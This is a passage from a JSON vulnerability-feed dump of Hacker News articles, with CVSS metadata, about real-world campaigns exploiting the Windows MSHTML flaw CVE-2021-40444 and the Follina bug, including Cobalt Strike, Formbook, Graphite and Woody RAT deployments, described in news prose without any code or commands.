known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEijZhKuLa-lQHOTya-LumppJRRe0-K5ZkrokQP6YCJulItM735L7x2VxidGSY3UAUweDYOrlUCjOSZOqKHcBnPJbUkrWJp74sfTiaR4x0D78nMuUhWticD0LtHFKvf1LGsYs6Cb9YnIJTJZwZygzO7MpLe49vP_YZwGnsgl_Jl9cnJRwT5-2Ahq8hf0/s728-e100/rat.jpg>)\n\nAn unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called **Woody RAT** for at least a year as part of a spear-phishing campaign.\n\nThe advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched \"Follina\" support diagnostic tool vulnerability ([CVE-2022-30190](<https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html>)) in Windows.\n\nLike other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems.\n\n\"The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group,\" Malwarebytes researchers Ankur Saini and Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) in a Wednesday report.\n\n\"When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.\"\n\nIn one instance, the hacking group attempted to strike a Russian aerospace and defense entity known as [OAK](<https://www.uacrussia.ru/en/>) based on evidence gleaned from a fake domain registered for this purpose.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg35LRJ0ayqjEMKo3ADOi7mLoAyI4moDW82GmOQ2AlRyBAr__ZIQMM7vFfzy16TW4_PJDRxTM3MyD7ds52s6eT0XLADE2Hz4UwUUa1dTPqwH82imY_KTeVPstKV8SaH6cUZFOFhzy9sDGaIgyuV67nCpgMjWxG3zJtHwhSLCWzu8TEc3yxib37k2VDO/s728-e100/malware.jpg>)\n\nAttacks leveraging the Windows flaw as part of this campaign first came to light on June 7, 2022, when researchers from the MalwareHunterTeam 